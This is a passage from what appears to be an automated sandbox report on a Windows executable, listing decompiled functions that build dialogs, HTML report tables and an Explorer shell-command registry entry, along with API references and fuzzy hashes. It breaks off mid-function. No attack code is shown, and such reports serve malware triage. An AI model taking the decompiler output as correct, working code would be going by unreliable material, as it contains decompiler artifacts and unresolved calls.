					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

size="%d", xrefs: 0040AF08
</b>, xrefs: 0040AF99
<b>, xrefs: 0040AF7C
color="#%s", xrefs: 0040AF44
</font>, xrefs: 0040AFAB
<font, xrefs: 0040AEF3

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

</table><p>, xrefs: 00407980
nowrap, xrefs: 00407858
 , xrefs: 00407917
<font color="%s">%s</font>, xrefs: 004078DE
bgcolor="%s", xrefs: 00407805
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C
<table border="1" cellpadding="5">, xrefs: 0040781B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B
<th%s>%s%s%s, xrefs: 00407CC5
bgcolor="%s", xrefs: 00407BCB
width="%s", xrefs: 00407C8B
</font>, xrefs: 00407C16
<font color="%s">, xrefs: 00407BFA

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

C:\, xrefs: 004044F1
:, xrefs: 004044E3
%s\shell\%s\command, xrefs: 00404462
%s\shell\%s, xrefs: 00404564
"%s",0, xrefs: 0040457D

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
